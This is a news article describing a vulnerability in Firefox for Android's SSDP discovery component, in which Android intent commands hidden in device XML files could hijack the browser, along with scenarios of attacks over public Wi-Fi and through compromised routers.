The bug was discovered by Chris Moberly, an Australian security researcher working for GitLab.

The actual vulnerability resides in the Firefox SSDP component. SSDP stands for Simple Service Discovery Protocol and is the mechanism through which Firefox finds other devices on the same network to share or receive content (i.e., such as sharing video streams with a Roku device).

When devices are found, the Firefox SSDP component gets the location of an XML file where that device's configuration is stored.

However, Moberly discovered that in older versions of Firefox, you could hide Android "intent" commands in this XML and have the Firefox browser execute the "intent," which could be a regular command like telling Firefox to access a link. 

Sample exploitation scenario

To better understand how this bug could be weaponized, imagine a scenario where a hacker walks into an airport or mall, connects to the Wi-Fi network, and then launches a script on their laptop that spams the network with malformed SSDP packets.

Any Android owner using a Firefox browser to navigate the web during this kind of an attack would have his mobile browser hijacked and taken to a malicious site, or forced to install a malicious Firefox extension.

Another scenario is if an attacker targets vulnerable Wi-Fi routers. Attackers could leverage exploits to take over outdated routers, and then spam a company's internal network and force employees to re-authenticate on phishing pages.

Earlier this week, Moberly published proof-of-concept code that could be used to carry out such attacks. Below are two videos of Moberly and an ESET security researcher demonstrating attacks.